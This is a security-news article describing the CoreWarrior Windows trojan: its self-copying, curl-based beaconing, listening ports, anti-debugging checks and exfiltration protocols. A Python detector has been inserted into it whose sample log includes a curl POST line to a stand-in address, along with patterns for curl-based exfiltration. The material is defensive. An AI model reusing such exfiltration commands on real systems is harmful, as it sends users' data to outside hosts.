CoreWarrior: A Trojan Horse on Steroids in the Windows World

The elusive virus changes its appearance over 600 times per hour.

SonicWall specialists have discovered new activity of CoreWarrior malware, a persistent Trojan that spreads at high speed. The virus creates dozens of copies of itself and connects to multiple IP addresses, creating access loopholes and controlling elements of the Windows user interface.

CoreWarrior is distributed as an executable file packed with UPX, which cannot be unpacked by standard means. At startup, the program creates a copy of itself with a random name and sends data to the server by invoking "curl" from the command line. With each successful POST request, the parent program deletes the previous copy and creates a new one. In just 10 minutes of operation, the malware can create and delete more than a hundred copies of itself.

During the activity, the program opens ports for listening in the ranges 49730-49777 and 50334-50679. A connection to the IP address 172.67.183.40 was also recorded, but no active TCP/UDP traffic was observed there.

The Trojan has anti-analysis mechanisms. In particular, it uses rdtsc-based timing checks as anti-debugging, as well as random sleep timers that change based on the number of connections. The program can determine whether it is running in a virtual environment by checking for Hyper-V containers. In addition, the malware supports the FTP, SMTP, and POP3 protocols for data exfiltration.
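As an added illustration (not from the SonicWall report or the post above), here is a small Python detector that scores endpoint log lines for the behaviours described: rapid churn of randomly named executable copies, curl POSTs spawned from the command line, and listeners in the reported port ranges. The log format, thresholds and sample lines are assumptions constructed for the example.

```python
import re
from datetime import datetime

# Listening-port ranges reported for the sample (from the writeup above).
LISTEN_RANGES = [(49730, 49777), (50334, 50679)]
# Thresholds are illustrative assumptions; the report only says >100 copies in ~10 minutes.
CHURN_THRESHOLD = 20
WINDOW_SECONDS = 600
# Constructed log format: "<ISO timestamp> <EVENT> <detail>".
LINE_RE = re.compile(r"^(\S+) (FILE_CREATE|FILE_DELETE|NET_LISTEN|PROC_CREATE) (.+)$")

def parse(lines):
    """Parse the constructed endpoint log lines into sorted (timestamp, kind, detail) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
            events.append((ts, m.group(2), m.group(3)))
    return sorted(events)

def in_listen_ranges(port):
    return any(lo <= port <= hi for lo, hi in LISTEN_RANGES)

def detect_corewarrior_pattern(lines):
    """Flag the three behaviours described: copy churn, curl POSTs, listeners in the ranges."""
    findings = {"copy_churn": 0, "curl_posts": 0, "listen_ports": [], "suspicious": False}
    events = parse(lines)
    if not events:
        return findings
    start = events[0][0]
    for ts, kind, detail in events:
        in_window = (ts - start).total_seconds() <= WINDOW_SECONDS
        if kind.startswith("FILE_") and in_window and detail.lower().endswith(".exe"):
            findings["copy_churn"] += 1          # executable created or deleted in the window
        elif kind == "PROC_CREATE" and "curl" in detail.lower() and "post" in detail.lower():
            findings["curl_posts"] += 1          # command-line curl used for a POST
        elif kind == "NET_LISTEN" and in_listen_ranges(int(detail)):
            findings["listen_ports"].append(int(detail))
    churn_with_beacon = findings["copy_churn"] >= CHURN_THRESHOLD and findings["curl_posts"] > 0
    findings["suspicious"] = churn_with_beacon or len(findings["listen_ports"]) >= 2
    return findings

# Constructed sample: 12 create/delete pairs of random-named copies, one curl POST, three listeners.
SAMPLE_LOG = [f"2024-05-01T09:00:{i:02d}Z {k} C:\\Temp\\copy{i:03d}.exe"
              for i in range(12) for k in ("FILE_CREATE", "FILE_DELETE")]
SAMPLE_LOG += ["2024-05-01T09:00:30Z PROC_CREATE curl.exe -X POST http://203.0.113.5/up",
               "2024-05-01T09:01:00Z NET_LISTEN 49731",
               "2024-05-01T09:01:05Z NET_LISTEN 50340",
               "2024-05-01T09:02:00Z NET_LISTEN 8080"]
```

Running `detect_corewarrior_pattern(SAMPLE_LOG)` reports 24 churn events, one curl POST and the two in-range listeners; the port 8080 listener is ignored.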

SonicWall has already released signatures to protect users from this Trojan. Other antivirus software manufacturers are expected to pick them up soon. To prevent possible attacks, users are advised to keep their security software, as well as its signature database, up to date.
